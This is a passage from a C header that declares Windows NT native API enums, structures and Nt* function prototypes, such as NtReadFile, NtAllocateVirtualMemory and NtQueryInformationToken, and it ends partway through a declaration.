_MEMORY_PARTITION_INFORMATION_CLASS\r\n{\r\n\tSystemMemoryPartitionInformation,\r\n\tSystemMemoryPartitionMoveMemory,\r\n\tSystemMemoryPartitionAddPagefile,\r\n\tSystemMemoryPartitionCombineMemory,\r\n\tSystemMemoryPartitionInitialAddMemory,\r\n\tSystemMemoryPartitionGetMemoryEvents,\r\n\tSystemMemoryPartitionMax\r\n} MEMORY_PARTITION_INFORMATION_CLASS, * PMEMORY_PARTITION_INFORMATION_CLASS;\r\n\r\ntypedef enum _MUTANT_INFORMATION_CLASS\r\n{\r\n\tMutantBasicInformation,\r\n\tMutantOwnerInformation\r\n} MUTANT_INFORMATION_CLASS, * PMUTANT_INFORMATION_CLASS;\r\n\r\ntypedef enum _ATOM_INFORMATION_CLASS\r\n{\r\n\tAtomBasicInformation,\r\n\tAtomTableInformation\r\n} ATOM_INFORMATION_CLASS, * PATOM_INFORMATION_CLASS;\r\n\r\ntypedef enum _SHUTDOWN_ACTION {\r\n\tShutdownNoReboot,\r\n\tShutdownReboot,\r\n\tShutdownPowerOff\r\n} SHUTDOWN_ACTION;\r\n\r\ntypedef VOID(CALLBACK* PTIMER_APC_ROUTINE)(\r\n\tIN PVOID TimerContext,\r\n\tIN ULONG TimerLowValue,\r\n\tIN LONG TimerHighValue);\r\n\r\ntypedef enum _KEY_VALUE_INFORMATION_CLASS {\r\n\tKeyValueBasicInformation = 0,\r\n\tKeyValueFullInformation,\r\n\tKeyValuePartialInformation,\r\n\tKeyValueFullInformationAlign64,\r\n\tKeyValuePartialInformationAlign64,\r\n\tMaxKeyValueInfoClass\r\n} KEY_VALUE_INFORMATION_CLASS;\r\n\r\ntypedef LANGID* PLANGID;\r\n\r\ntypedef struct _PLUGPLAY_EVENT_BLOCK\r\n{\r\n\tGUID EventGuid;\r\n\tPLUGPLAY_EVENT_CATEGORY EventCategory;\r\n\tPULONG Result;\r\n\tULONG Flags;\r\n\tULONG TotalSize;\r\n\tPVOID DeviceObject;\r\n\r\n\tunion\r\n\t{\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tGUID ClassGuid;\r\n\t\t\tWCHAR SymbolicLinkName[1];\r\n\t\t} DeviceClass;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tWCHAR DeviceIds[1];\r\n\t\t} TargetDevice;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tWCHAR DeviceId[1];\r\n\t\t} InstallDevice;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tPVOID NotificationStructure;\r\n\t\t\tWCHAR DeviceIds[1];\r\n\t\t} CustomNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tPVOID Notification;\r\n\t\t} 
ProfileNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tULONG NotificationCode;\r\n\t\t\tULONG NotificationData;\r\n\t\t} PowerNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tPNP_VETO_TYPE VetoType;\r\n\t\t\tWCHAR DeviceIdVetoNameBuffer[1]; // DeviceId<null>VetoName<null><null>\r\n\t\t} VetoNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tGUID BlockedDriverGuid;\r\n\t\t} BlockedDriverNotification;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tWCHAR ParentId[1];\r\n\t\t} InvalidIDNotification;\r\n\t} u;\r\n} PLUGPLAY_EVENT_BLOCK, * PPLUGPLAY_EVENT_BLOCK;\r\n\r\ntypedef VOID(NTAPI* PIO_APC_ROUTINE) (\r\n\tIN PVOID            ApcContext,\r\n\tIN PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG            Reserved);\r\n\r\ntypedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;\r\n\r\ntypedef enum _DIRECTORY_NOTIFY_INFORMATION_CLASS\r\n{\r\n\tDirectoryNotifyInformation = 1,\r\n\tDirectoryNotifyExtendedInformation = 2,\r\n} DIRECTORY_NOTIFY_INFORMATION_CLASS, * PDIRECTORY_NOTIFY_INFORMATION_CLASS;\r\n\r\ntypedef enum _EVENT_INFORMATION_CLASS\r\n{\r\n\tEventBasicInformation\r\n} EVENT_INFORMATION_CLASS, * PEVENT_INFORMATION_CLASS;\r\n\r\ntypedef struct _ALPC_MESSAGE_ATTRIBUTES\r\n{\r\n\tunsigned long AllocatedAttributes;\r\n\tunsigned long ValidAttributes;\r\n} ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES;\r\n\r\ntypedef struct _ALPC_PORT_ATTRIBUTES\r\n{\r\n\tULONG                       Flags;\r\n\tSECURITY_QUALITY_OF_SERVICE SecurityQos;\r\n\tSIZE_T                      MaxMessageLength;\r\n\tSIZE_T                      MemoryBandwidth;\r\n\tSIZE_T                      MaxPoolUsage;\r\n\tSIZE_T                      MaxSectionSize;\r\n\tSIZE_T                      MaxViewSize;\r\n\tSIZE_T                      MaxTotalSectionSize;\r\n\tULONG                       DupObjectTypes;\r\n#ifdef _WIN64\r\n\tULONG                       Reserved;\r\n#endif\r\n} ALPC_PORT_ATTRIBUTES, * PALPC_PORT_ATTRIBUTES;\r\n\r\ntypedef enum _IO_SESSION_STATE\r\n{\r\n\tIoSessionStateCreated = 1,\r\n\tIoSessionStateInitialized 
= 2,\r\n\tIoSessionStateConnected = 3,\r\n\tIoSessionStateDisconnected = 4,\r\n\tIoSessionStateDisconnectedLoggedOn = 5,\r\n\tIoSessionStateLoggedOn = 6,\r\n\tIoSessionStateLoggedOff = 7,\r\n\tIoSessionStateTerminated = 8,\r\n\tIoSessionStateMax = 9,\r\n} IO_SESSION_STATE, * PIO_SESSION_STATE;\r\n\r\ntypedef const WNF_STATE_NAME* PCWNF_STATE_NAME;\r\n\r\ntypedef const WNF_TYPE_ID* PCWNF_TYPE_ID;\r\n\r\ntypedef struct _WNF_DELIVERY_DESCRIPTOR\r\n{\r\n\tunsigned __int64 SubscriptionId;\r\n\tWNF_STATE_NAME   StateName;\r\n\tunsigned long    ChangeStamp;\r\n\tunsigned long    StateDataSize;\r\n\tunsigned long    EventMask;\r\n\tWNF_TYPE_ID      TypeId;\r\n\tunsigned long    StateDataOffset;\r\n} WNF_DELIVERY_DESCRIPTOR, * PWNF_DELIVERY_DESCRIPTOR;\r\n\r\ntypedef enum _DEBUG_CONTROL_CODE\r\n{\r\n\tSysDbgQueryModuleInformation = 0,\r\n\tSysDbgQueryTraceInformation = 1,\r\n\tSysDbgSetTracePoint = 2,\r\n\tSysDbgSetSpecialCall = 3,\r\n\tSysDbgClearSpecialCalls = 4,\r\n\tSysDbgQuerySpecialCalls = 5,\r\n\tSysDbgBreakPoint = 6,\r\n\tSysDbgQueryVersion = 7,\r\n\tSysDbgReadVirtual = 8,\r\n\tSysDbgWriteVirtual = 9,\r\n\tSysDbgReadPhysical = 10,\r\n\tSysDbgWritePhysical = 11,\r\n\tSysDbgReadControlSpace = 12,\r\n\tSysDbgWriteControlSpace = 13,\r\n\tSysDbgReadIoSpace = 14,\r\n\tSysDbgWriteIoSpace = 15,\r\n\tSysDbgReadMsr = 16,\r\n\tSysDbgWriteMsr = 17,\r\n\tSysDbgReadBusData = 18,\r\n\tSysDbgWriteBusData = 19,\r\n\tSysDbgCheckLowMemory = 20,\r\n\tSysDbgEnableKernelDebugger = 21,\r\n\tSysDbgDisableKernelDebugger = 22,\r\n\tSysDbgGetAutoKdEnable = 23,\r\n\tSysDbgSetAutoKdEnable = 24,\r\n\tSysDbgGetPrintBufferSize = 25,\r\n\tSysDbgSetPrintBufferSize = 26,\r\n\tSysDbgGetKdUmExceptionEnable = 27,\r\n\tSysDbgSetKdUmExceptionEnable = 28,\r\n\tSysDbgGetTriageDump = 29,\r\n\tSysDbgGetKdBlockEnable = 30,\r\n\tSysDbgSetKdBlockEnable = 31\r\n} DEBUG_CONTROL_CODE, * PDEBUG_CONTROL_CODE;\r\n\r\ntypedef struct 
_PORT_MESSAGE\r\n{\r\n\tunion\r\n\t{\r\n\t\tunion\r\n\t\t{\r\n\t\t\tstruct\r\n\t\t\t{\r\n\t\t\t\tshort DataLength;\r\n\t\t\t\tshort TotalLength;\r\n\t\t\t} s1;\r\n\t\t\tunsigned long Length;\r\n\t\t};\r\n\t} u1;\r\n\tunion\r\n\t{\r\n\t\tunion\r\n\t\t{\r\n\t\t\tstruct\r\n\t\t\t{\r\n\t\t\t\tshort Type;\r\n\t\t\t\tshort DataInfoOffset;\r\n\t\t\t} s2;\r\n\t\t\tunsigned long ZeroInit;\r\n\t\t};\r\n\t} u2;\r\n\tunion\r\n\t{\r\n\t\tCLIENT_ID ClientId;\r\n\t\tdouble    DoNotUseThisField;\r\n\t};\r\n\tunsigned long MessageId;\r\n\tunion\r\n\t{\r\n\t\tunsigned __int64 ClientViewSize;\r\n\t\tstruct\r\n\t\t{\r\n\t\t\tunsigned long CallbackId;\r\n\t\t\tlong          __PADDING__[1];\r\n\t\t};\r\n\t};\r\n} PORT_MESSAGE, * PPORT_MESSAGE;\r\n\r\ntypedef struct FILE_BASIC_INFORMATION\r\n{\r\n\tLARGE_INTEGER CreationTime;\r\n\tLARGE_INTEGER LastAccessTime;\r\n\tLARGE_INTEGER LastWriteTime;\r\n\tLARGE_INTEGER ChangeTime;\r\n\tULONG         FileAttributes;\r\n} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;\r\n\r\ntypedef struct _PORT_SECTION_READ\r\n{\r\n\tULONG Length;\r\n\tULONG ViewSize;\r\n\tULONG ViewBase;\r\n} PORT_SECTION_READ, * PPORT_SECTION_READ;\r\n\r\ntypedef struct _PORT_SECTION_WRITE\r\n{\r\n\tULONG  Length;\r\n\tHANDLE SectionHandle;\r\n\tULONG  SectionOffset;\r\n\tULONG  ViewSize;\r\n\tPVOID  ViewBase;\r\n\tPVOID  TargetViewBase;\r\n} PORT_SECTION_WRITE, * PPORT_SECTION_WRITE;\r\n\r\ntypedef enum _TIMER_TYPE\r\n{\r\n\tNotificationTimer,\r\n\tSynchronizationTimer\r\n} TIMER_TYPE, * PTIMER_TYPE;\r\n\r\ntypedef struct _BOOT_ENTRY\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Id;\r\n\tULONG Attributes;\r\n\tULONG FriendlyNameOffset;\r\n\tULONG BootFilePathOffset;\r\n\tULONG OsOptionsLength;\r\n\tUCHAR OsOptions[ANYSIZE_ARRAY];\r\n} BOOT_ENTRY, * PBOOT_ENTRY;\r\n\r\ntypedef struct _EFI_DRIVER_ENTRY\r\n{\r\n\tULONG Version;\r\n\tULONG Length;\r\n\tULONG Id;\r\n\tULONG Attributes;\r\n\tULONG FriendlyNameOffset;\r\n\tULONG DriverFilePathOffset;\r\n} 
EFI_DRIVER_ENTRY, * PEFI_DRIVER_ENTRY;\r\n\r\ntypedef USHORT RTL_ATOM, * PRTL_ATOM;\r\n\r\ntypedef enum _TIMER_SET_INFORMATION_CLASS\r\n{\r\n\tTimerSetCoalescableTimer,\r\n\tMaxTimerInfoClass\r\n} TIMER_SET_INFORMATION_CLASS, * PTIMER_SET_INFORMATION_CLASS;\r\n\r\ntypedef enum _FSINFOCLASS\r\n{\r\n\tFileFsVolumeInformation = 1,\r\n\tFileFsLabelInformation = 2,\r\n\tFileFsSizeInformation = 3,\r\n\tFileFsDeviceInformation = 4,\r\n\tFileFsAttributeInformation = 5,\r\n\tFileFsControlInformation = 6,\r\n\tFileFsFullSizeInformation = 7,\r\n\tFileFsObjectIdInformation = 8,\r\n\tFileFsDriverPathInformation = 9,\r\n\tFileFsVolumeFlagsInformation = 10,\r\n\tFileFsSectorSizeInformation = 11,\r\n\tFileFsDataCopyInformation = 12,\r\n\tFileFsMetadataSizeInformation = 13,\r\n\tFileFsFullSizeInformationEx = 14,\r\n\tFileFsMaximumInformation = 15,\r\n} FSINFOCLASS, * PFSINFOCLASS;\r\n\r\ntypedef enum _WAIT_TYPE\r\n{\r\n\tWaitAll = 0,\r\n\tWaitAny = 1\r\n} WAIT_TYPE, * PWAIT_TYPE;\r\n\r\ntypedef struct _USER_STACK\r\n{\r\n\tPVOID FixedStackBase;\r\n\tPVOID FixedStackLimit;\r\n\tPVOID ExpandableStackBase;\r\n\tPVOID ExpandableStackLimit;\r\n\tPVOID ExpandableStackBottom;\r\n} USER_STACK, * PUSER_STACK;\r\n\r\ntypedef enum _SECTION_INFORMATION_CLASS\r\n{\r\n\tSectionBasicInformation,\r\n\tSectionImageInformation,\r\n} SECTION_INFORMATION_CLASS, * PSECTION_INFORMATION_CLASS;\r\n\r\ntypedef enum _APPHELPCACHESERVICECLASS\r\n{\r\n\tApphelpCacheServiceLookup = 0,\r\n\tApphelpCacheServiceRemove = 1,\r\n\tApphelpCacheServiceUpdate = 2,\r\n\tApphelpCacheServiceFlush = 3,\r\n\tApphelpCacheServiceDump = 4,\r\n\tApphelpDBGReadRegistry = 0x100,\r\n\tApphelpDBGWriteRegistry = 0x101,\r\n} APPHELPCACHESERVICECLASS, * PAPPHELPCACHESERVICECLASS;\r\n\r\ntypedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION\r\n{\r\n\tUSHORT Version;\r\n\tUSHORT Reserved;\r\n\tULONG  AttributeCount;\r\n\tunion\r\n\t{\r\n\t\tPTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;\r\n\t} Attribute;\r\n} 
TOKEN_SECURITY_ATTRIBUTES_INFORMATION, * PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;\r\n\r\ntypedef struct _FILE_IO_COMPLETION_INFORMATION\r\n{\r\n\tPVOID           KeyContext;\r\n\tPVOID           ApcContext;\r\n\tIO_STATUS_BLOCK IoStatusBlock;\r\n} FILE_IO_COMPLETION_INFORMATION, * PFILE_IO_COMPLETION_INFORMATION;\r\n\r\ntypedef PVOID PT2_CANCEL_PARAMETERS;\r\n\r\ntypedef enum _THREADINFOCLASS\r\n{\r\n\tThreadBasicInformation,\r\n\tThreadTimes,\r\n\tThreadPriority,\r\n\tThreadBasePriority,\r\n\tThreadAffinityMask,\r\n\tThreadImpersonationToken,\r\n\tThreadDescriptorTableEntry,\r\n\tThreadEnableAlignmentFaultFixup,\r\n\tThreadEventPair_Reusable,\r\n\tThreadQuerySetWin32StartAddress,\r\n\tThreadZeroTlsCell,\r\n\tThreadPerformanceCount,\r\n\tThreadAmILastThread,\r\n\tThreadIdealProcessor,\r\n\tThreadPriorityBoost,\r\n\tThreadSetTlsArrayAddress,\r\n\tThreadIsIoPending,\r\n\tThreadHideFromDebugger,\r\n\tThreadBreakOnTermination,\r\n\tMaxThreadInfoClass\r\n} THREADINFOCLASS, * PTHREADINFOCLASS;\r\n\r\ntypedef enum _OBJECT_INFORMATION_CLASS\r\n{\r\n\tObjectBasicInformation,\r\n\tObjectNameInformation,\r\n\tObjectTypeInformation,\r\n\tObjectAllTypesInformation,\r\n\tObjectHandleInformation\r\n} OBJECT_INFORMATION_CLASS, * POBJECT_INFORMATION_CLASS;\r\n\r\ntypedef enum _FILE_INFORMATION_CLASS\r\n{\r\n\tFileDirectoryInformation = 1,\r\n\tFileFullDirectoryInformation = 2,\r\n\tFileBothDirectoryInformation = 3,\r\n\tFileBasicInformation = 4,\r\n\tFileStandardInformation = 5,\r\n\tFileInternalInformation = 6,\r\n\tFileEaInformation = 7,\r\n\tFileAccessInformation = 8,\r\n\tFileNameInformation = 9,\r\n\tFileRenameInformation = 10,\r\n\tFileLinkInformation = 11,\r\n\tFileNamesInformation = 12,\r\n\tFileDispositionInformation = 13,\r\n\tFilePositionInformation = 14,\r\n\tFileFullEaInformation = 15,\r\n\tFileModeInformation = 16,\r\n\tFileAlignmentInformation = 17,\r\n\tFileAllInformation = 18,\r\n\tFileAllocationInformation = 19,\r\n\tFileEndOfFileInformation = 
20,\r\n\tFileAlternateNameInformation = 21,\r\n\tFileStreamInformation = 22,\r\n\tFilePipeInformation = 23,\r\n\tFilePipeLocalInformation = 24,\r\n\tFilePipeRemoteInformation = 25,\r\n\tFileMailslotQueryInformation = 26,\r\n\tFileMailslotSetInformation = 27,\r\n\tFileCompressionInformation = 28,\r\n\tFileObjectIdInformation = 29,\r\n\tFileCompletionInformation = 30,\r\n\tFileMoveClusterInformation = 31,\r\n\tFileQuotaInformation = 32,\r\n\tFileReparsePointInformation = 33,\r\n\tFileNetworkOpenInformation = 34,\r\n\tFileAttributeTagInformation = 35,\r\n\tFileTrackingInformation = 36,\r\n\tFileIdBothDirectoryInformation = 37,\r\n\tFileIdFullDirectoryInformation = 38,\r\n\tFileValidDataLengthInformation = 39,\r\n\tFileShortNameInformation = 40,\r\n\tFileIoCompletionNotificationInformation = 41,\r\n\tFileIoStatusBlockRangeInformation = 42,\r\n\tFileIoPriorityHintInformation = 43,\r\n\tFileSfioReserveInformation = 44,\r\n\tFileSfioVolumeInformation = 45,\r\n\tFileHardLinkInformation = 46,\r\n\tFileProcessIdsUsingFileInformation = 47,\r\n\tFileNormalizedNameInformation = 48,\r\n\tFileNetworkPhysicalNameInformation = 49,\r\n\tFileIdGlobalTxDirectoryInformation = 50,\r\n\tFileIsRemoteDeviceInformation = 51,\r\n\tFileUnusedInformation = 52,\r\n\tFileNumaNodeInformation = 53,\r\n\tFileStandardLinkInformation = 54,\r\n\tFileRemoteProtocolInformation = 55,\r\n\tFileRenameInformationBypassAccessCheck = 56,\r\n\tFileLinkInformationBypassAccessCheck = 57,\r\n\tFileVolumeNameInformation = 58,\r\n\tFileIdInformation = 59,\r\n\tFileIdExtdDirectoryInformation = 60,\r\n\tFileReplaceCompletionInformation = 61,\r\n\tFileHardLinkFullIdInformation = 62,\r\n\tFileIdExtdBothDirectoryInformation = 63,\r\n\tFileDispositionInformationEx = 64,\r\n\tFileRenameInformationEx = 65,\r\n\tFileRenameInformationExBypassAccessCheck = 66,\r\n\tFileMaximumInformation = 67,\r\n} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;\r\n\r\ntypedef enum _KEY_INFORMATION_CLASS\r\n{\r\n\tKeyBasicInformation = 
0,\r\n\tKeyNodeInformation = 1,\r\n\tKeyFullInformation = 2,\r\n\tKeyNameInformation = 3,\r\n\tKeyCachedInformation = 4,\r\n\tKeyFlagsInformation = 5,\r\n\tKeyVirtualizationInformation = 6,\r\n\tKeyHandleTagsInformation = 7,\r\n\tMaxKeyInfoClass = 8\r\n} KEY_INFORMATION_CLASS, * PKEY_INFORMATION_CLASS;\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n\tULONG           Length;\r\n\tHANDLE          RootDirectory;\r\n\tPUNICODE_STRING ObjectName;\r\n\tULONG           Attributes;\r\n\tPVOID           SecurityDescriptor;\r\n\tPVOID           SecurityQualityOfService;\r\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\r\n\r\ntypedef enum _TIMER_INFORMATION_CLASS\r\n{\r\n\tTimerBasicInformation\r\n} TIMER_INFORMATION_CLASS, * PTIMER_INFORMATION_CLASS;\r\n\r\ntypedef struct _KCONTINUE_ARGUMENT\r\n{\r\n\tKCONTINUE_TYPE ContinueType;\r\n\tULONG          ContinueFlags;\r\n\tULONGLONG      Reserved[2];\r\n} KCONTINUE_ARGUMENT, * PKCONTINUE_ARGUMENT;\r\n\r\nEXTERN_C NTSTATUS NtAccessCheck(\r\n\tIN PSECURITY_DESCRIPTOR pSecurityDescriptor,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiaredAccess,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tOUT PPRIVILEGE_SET PrivilegeSet OPTIONAL,\r\n\tIN OUT PULONG PrivilegeSetLength,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PBOOLEAN AccessStatus);\r\n\r\nEXTERN_C NTSTATUS NtWorkerFactoryWorkerReady(\r\n\tIN HANDLE WorkerFactoryHandle);\r\n\r\nEXTERN_C NTSTATUS NtAcceptConnectPort(\r\n\tOUT PHANDLE ServerPortHandle,\r\n\tIN ULONG AlternativeReceivePortHandle OPTIONAL,\r\n\tIN PPORT_MESSAGE ConnectionReply,\r\n\tIN BOOLEAN AcceptConnection,\r\n\tIN OUT PPORT_SECTION_WRITE ServerSharedMemory OPTIONAL,\r\n\tOUT PPORT_SECTION_READ ClientSharedMemory OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtMapUserPhysicalPagesScatter(\r\n\tIN PVOID VirtualAddresses,\r\n\tIN PULONG NumberOfPages,\r\n\tIN PULONG UserPfnArray OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForSingleObject(\r\n\tIN HANDLE ObjectHandle,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER 
TimeOut OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCallbackReturn(\r\n\tIN PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputLength,\r\n\tIN NTSTATUS Status);\r\n\r\nEXTERN_C NTSTATUS NtReadFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tOUT PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset OPTIONAL,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDeviceIoControlFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG IoControlCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtWriteFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset OPTIONAL,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRemoveIoCompletion(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tOUT PULONG KeyContext,\r\n\tOUT PULONG ApcContext,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtReleaseSemaphore(\r\n\tIN HANDLE SemaphoreHandle,\r\n\tIN LONG ReleaseCount,\r\n\tOUT PLONG PreviousCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtReplyWaitReceivePort(\r\n\tIN HANDLE PortHandle,\r\n\tOUT PVOID PortContext OPTIONAL,\r\n\tIN PPORT_MESSAGE ReplyMessage OPTIONAL,\r\n\tOUT PPORT_MESSAGE ReceiveMessage);\r\n\r\nEXTERN_C NTSTATUS NtReplyPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE ReplyMessage);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS 
ThreadInformationClass,\r\n\tIN PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetEvent(\r\n\tIN HANDLE EventHandle,\r\n\tOUT PULONG PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtClose(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtQueryObject(\r\n\tIN HANDLE Handle,\r\n\tIN OBJECT_INFORMATION_CLASS ObjectInformationClass,\r\n\tOUT PVOID ObjectInformation OPTIONAL,\r\n\tIN ULONG ObjectInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtOpenKey(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN ULONG Index,\r\n\tIN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\r\n\tOUT PVOID KeyValueInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtFindAtom(\r\n\tIN PWSTR AtomName OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PUSHORT Atom OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDefaultLocale(\r\n\tIN BOOLEAN UserProfile,\r\n\tOUT PLCID DefaultLocaleId);\r\n\r\nEXTERN_C NTSTATUS NtQueryKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN KEY_INFORMATION_CLASS KeyInformationClass,\r\n\tOUT PVOID KeyInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtQueryValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING ValueName,\r\n\tIN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\r\n\tOUT PVOID KeyValueInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtAllocateVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN OUT PSIZE_T 
RegionSize,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Protect);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PROCESSINFOCLASS ProcessInformationClass,\r\n\tOUT PVOID ProcessInformation,\r\n\tIN ULONG ProcessInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForMultipleObjects32(\r\n\tIN ULONG ObjectCount,\r\n\tIN PHANDLE Handles,\r\n\tIN WAIT_TYPE WaitType,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWriteFileGather(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_SEGMENT_ELEMENT SegmentArray,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateKey(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG TitleIndex,\r\n\tIN PUNICODE_STRING Class OPTIONAL,\r\n\tIN ULONG CreateOptions,\r\n\tOUT PULONG Disposition OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtFreeVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG FreeType);\r\n\r\nEXTERN_C NTSTATUS NtImpersonateClientOfPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message);\r\n\r\nEXTERN_C NTSTATUS NtReleaseMutant(\r\n\tIN HANDLE MutantHandle,\r\n\tOUT PULONG PreviousCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN TOKEN_INFORMATION_CLASS TokenInformationClass,\r\n\tOUT PVOID TokenInformation,\r\n\tIN ULONG TokenInformationLength,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtRequestWaitReplyPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE RequestMessage,\r\n\tOUT PPORT_MESSAGE ReplyMessage);\r\n\r\nEXTERN_C NTSTATUS NtQueryVirtualMemory(\r\n\tIN HANDLE 
